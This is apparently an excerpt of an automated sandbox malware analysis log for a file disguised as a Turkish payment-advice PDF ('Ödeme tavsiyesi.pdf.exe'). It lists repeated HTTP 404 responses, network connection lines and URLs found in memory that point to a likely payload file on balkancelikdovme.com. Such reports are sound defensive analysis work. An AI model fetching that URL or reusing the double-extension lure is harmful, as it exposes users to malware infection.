Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:25:35 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:25:37 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:25:39 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:25:40 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:25:42 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:25:44 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:25:46 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:25:48 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:25:50 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:25:52 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:25:54 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:25:56 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:25:58 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:26:00 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:26:02 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:26:03 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:26:06 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:26:08 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:26:09 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:26:12 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:26:13 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:26:16 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:26:18 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:26:20 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:26:21 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:26:23 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:26:25 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:26:27 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:26:29 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:26:31 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:26:33 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:26:35 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:26:37 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:26:38 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:26:40 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:26:42 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:26:44 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:26:46 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:26:48 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:26:50 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:26:52 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:26:53 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:26:55 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:26:57 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:26:59 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:27:01 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:27:03 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:27:05 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:27:06 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:27:08 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:27:10 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:27:12 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:27:14 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:27:16 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:27:18 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:27:20 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:27:22 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:27:24 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:27:26 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:27:28 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:27:29 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:27:31 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:27:33 GMTvary: User-Agent
Source: #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3908344532.0000000002CFA000.00000004.00000800.00020000.00000000.sdmp, #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3908344532.0000000002FFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://balkancelikdovme.com
Source: #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3908344532.0000000002CFA000.00000004.00000800.00020000.00000000.sdmp, #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3908344532.0000000002FFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://balkancelikdovme.comd
Source: #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3908344532.0000000002C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3908344532.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3908344532.0000000003367000.00000004.00000800.00020000.00000000.sdmp, #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3908344532.000000000336B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://balkancelikdovme.com
Source: #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3908344532.0000000002D7B000.00000004.00000800.00020000.00000000.sdmp, #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3908344532.0000000002FFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://balkancelikdovme.com/eyiiam/Qtmwlbx
Source: #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3908344532.0000000002FFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://balkancelikdovme.com/eyiiam/QtmwlbxVu
Source: #U00d6deme tavsiyesi.pdf.exeString found in binary or memory: https://balkancelikdovme.com/eyiiam/Qtmwlbz.dat
Source: #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3908344532.0000000003367000.00000004.00000800.00020000.00000000.sdmp, #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3908344532.000000000336B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://balkancelikdovme.com/eyiiam/Qtmwlbz.datd
Source: #U00d6deme tavsiyesi.pdf.exe, 00000000.00000002.3908344532.0000000002C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://balkancelikdovme.com/eyiiam/Qtmwlbz.dattooq
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50064 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
